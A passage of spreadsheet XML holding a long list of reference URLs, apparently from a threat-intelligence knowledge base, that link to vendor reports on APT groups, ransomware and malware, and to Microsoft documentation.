    <t>https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing</t>
  </si>
  <si>
    <t>https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack</t>
  </si>
  <si>
    <t>https://www.secureworks.com/research/revil-sodinokibi-ransomware</t>
  </si>
  <si>
    <t>http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory</t>
  </si>
  <si>
    <t>https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html</t>
  </si>
  <si>
    <t>http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html</t>
  </si>
  <si>
    <t>https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html</t>
  </si>
  <si>
    <t>https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/</t>
  </si>
  <si>
    <t>https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/</t>
  </si>
  <si>
    <t>https://securitytrails.com/blog/google-hacking-techniques</t>
  </si>
  <si>
    <t>https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia</t>
  </si>
  <si>
    <t>http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf</t>
  </si>
  <si>
    <t>https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/</t>
  </si>
  <si>
    <t>https://github.com/sensepost/notruler</t>
  </si>
  <si>
    <t>https://sensepost.com/blog/2017/outlook-forms-and-shells/</t>
  </si>
  <si>
    <t>https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/</t>
  </si>
  <si>
    <t>https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/</t>
  </si>
  <si>
    <t>https://github.com/sensepost/ruler</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/</t>
  </si>
  <si>
    <t>https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/</t>
  </si>
  <si>
    <t>https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/</t>
  </si>
  <si>
    <t>https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/</t>
  </si>
  <si>
    <t>https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/</t>
  </si>
  <si>
    <t xml:space="preserve">https://assets.sentinelone.com/labs/sentinel-one-valak-i   </t>
  </si>
  <si>
    <t>https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/</t>
  </si>
  <si>
    <t>https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/</t>
  </si>
  <si>
    <t>https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/</t>
  </si>
  <si>
    <t>http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events</t>
  </si>
  <si>
    <t>https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/</t>
  </si>
  <si>
    <t>https://shodan.io</t>
  </si>
  <si>
    <t>https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence</t>
  </si>
  <si>
    <t>https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml</t>
  </si>
  <si>
    <t>https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/</t>
  </si>
  <si>
    <t>https://silentbreaksecurity.com/malicious-outlook-rules/</t>
  </si>
  <si>
    <t>https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx</t>
  </si>
  <si>
    <t>http://www.sixdub.net/?p=367</t>
  </si>
  <si>
    <t>https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219</t>
  </si>
  <si>
    <t>https://www.smartmontools.org/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/</t>
  </si>
  <si>
    <t>https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</t>
  </si>
  <si>
    <t>http://news.softpedia.com/news/cryptocurrency-mining-malware-discovered-targeting-seagate-nas-hard-drives-508119.shtml</t>
  </si>
  <si>
    <t>https://www.sogeti.com/globalassets/reports/cybersecchronicles_-_babuk.pdf</t>
  </si>
  <si>
    <t>https://www.solarwinds.com/sa-overview/securityadvisory</t>
  </si>
  <si>
    <t>https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/</t>
  </si>
  <si>
    <t>https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/</t>
  </si>
  <si>
    <t>https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2019/03/05/emotet-101-stage-4-command-and-control/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/</t>
  </si>
  <si>
    <t>https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics</t>
  </si>
  <si>
    <t>https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/</t>
  </si>
  <si>
    <t>https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf</t>
  </si>
  <si>
    <t>https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/</t>
  </si>
  <si>
    <t>https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf</t>
  </si>
  <si>
    <t>http://rkhunter.sourceforge.net</t>
  </si>
  <si>
    <t>https://heyoka.sourceforge.net/</t>
  </si>
  <si>
    <t>https://posts.specterops.io/head-in-the-clouds-bd038bb69e48</t>
  </si>
  <si>
    <t>https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512</t>
  </si>
  <si>
    <t>https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf</t>
  </si>
  <si>
    <t>https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f</t>
  </si>
  <si>
    <t>https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec</t>
  </si>
  <si>
    <t>https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353</t>
  </si>
  <si>
    <t>https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea</t>
  </si>
  <si>
    <t>https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf</t>
  </si>
  <si>
    <t>https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html</t>
  </si>
  <si>
    <t>https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html</t>
  </si>
  <si>
    <t>https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/</t>
  </si>
  <si>
    <t>https://securelist.com/the-spring-dragon-apt/70726/</t>
  </si>
  <si>
    <t>https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/</t>
  </si>
  <si>
    <t>https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis</t>
  </si>
  <si>
    <t>https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/</t>
  </si>
  <si>
    <t>https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html</t>
  </si>
  <si>
    <t>https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/</t>
  </si>
  <si>
    <t>https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/</t>
  </si>
  <si>
    <t>https://blog.stealthbits.com/detect-pass-the-ticket-attacks</t>
  </si>
  <si>
    <t>https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/</t>
  </si>
  <si>
    <t>https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning</t>
  </si>
  <si>
    <t>https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html</t>
  </si>
  <si>
    <t>https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html</t>
  </si>
  <si>
    <t>https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html</t>
  </si>
  <si>
    <t>https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/</t>
  </si>
  <si>
    <t>https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu</t>
  </si>
  <si>
    <t>https://www.mandiant.com/resources/russian-targeting-gov-business</t>
  </si>
  <si>
    <t>https://www.sygnia.co/golden-saml-advisory</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/election-security/apt28-espionage-military-government</t>
  </si>
  <si>
    <t>https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/malware-update-windows-update</t>
  </si>
  <si>
    <t>http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&amp;tabid=2</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime</t>
  </si>
  <si>
    <t>https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days</t>
  </si>
  <si>
    <t>https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20190508170055/https://www.symantec.com/security-center/writeup/2000-122010-2655-99</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage</t>
  </si>
  <si>
    <t>https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/life-mars-how-attackers-took-advantage-hope-alien-existance-new-darkmoon-campaign</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates</t>
  </si>
  <si>
    <t>https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&amp;CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&amp;tab=librarydocuments</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks</t>
  </si>
  <si>
    <t>https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers</t>
  </si>
  <si>
    <t>http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dyre-emerging-threat.pdf</t>
  </si>
  <si>
    <t>https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2010-011114-1830-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/how-trojanhydraq-stays-your-computer</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/inception-framework-hiding-behind-proxies</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051605-2535-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries</t>
  </si>
  <si>
    <t>http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3909-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/articles/ssh-and-ssh-agent</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory</t>
  </si>
  <si>
    <t>https://www.symantec.com/security-center/writeup/2016-081923-2700-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/shamoon-attacks</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</t>
  </si>
  <si>
    <t>http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan</t>
  </si>
  <si>
    <t>https://www.symantec.com/connect/blogs/trojanhydraq-incident</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&amp;tabid=2</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2</t>
  </si>
  <si>
    <t>https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf</t>
  </si>
  <si>
    <t>https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us</t>
  </si>
  <si>
    <t>https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&amp;y=2015#gsc.tab=0&amp;gsc.q=waterbug-attack-group.pdf&amp;gsc.page=1</t>
  </si>
  <si>
    <t>https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments</t>
  </si>
  <si>
    <t>https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore</t>
  </si>
  <si>
    <t>https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99</t>
  </si>
  <si>
    <t>https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf</t>
  </si>
  <si>
    <t>https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/</t>
  </si>
  <si>
    <t>https://lwn.net/Articles/604515/</t>
  </si>
  <si>
    <t>https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/</t>
  </si>
  <si>
    <t>https://forum.sysinternals.com/appcertdlls_topic12546.html</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread</t>
  </si>
  <si>
    <t>https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web</t>
  </si>
  <si>
    <t>https://www.tecmint.com/control-systemd-services-on-remote-linux-server/</t>
  </si>
  <si>
    <t>https://www.freedesktop.org/software/systemd/man/systemd.service.html</t>
  </si>
  <si>
    <t>https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md</t>
  </si>
  <si>
    <t>http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf</t>
  </si>
  <si>
    <t>https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6</t>
  </si>
  <si>
    <t>https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html</t>
  </si>
  <si>
    <t>https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html</t>
  </si>
  <si>
    <t>http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html</t>
  </si>
  <si>
    <t xml:space="preserve"> https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/01/return-of-emotet.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/06/palestine-delphi.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/05/navrat.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/02/olympic-destroyer.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2020/10/poetrat-update.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/04/introducing-rokrat.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html#more</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/07/template-injection.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/09/tinyturla.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More</t>
  </si>
  <si>
    <t>https://blogs.cisco.com/security/talos/opening-zxshell</t>
  </si>
  <si>
    <t>https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/</t>
  </si>
  <si>
    <t>https://unit42.paloaltonetworks.com/teamtnt-operations-cloud-environments</t>
  </si>
  <si>
    <t>https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/ee791851.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490864.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490866.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/dn487457.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/sysinternals/bb963902</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc732443.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490880.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490886.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/dn535501.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc771049.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc755121.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc732952.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc700828.aspx</t>
  </si>
  <si>
    <t>https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490921.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/dn487450.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc940106.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/bb490716.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc958811.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/bb490939.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc771046(v=ws.10).aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490947.aspx</t>
  </si>
  <si>
    <t>https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490968.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc731150.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc732713.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc787851.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490991.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/dd315590.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/dn221960.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/bb490996.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/cc938799.aspx</t>
  </si>
  <si>
    <t>https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/library/jj852168.aspx</t>
  </si>
  <si>
    <t>https://technet.microsoft.com/en-us/library/cc772408.aspx</t>
  </si>
  <si>
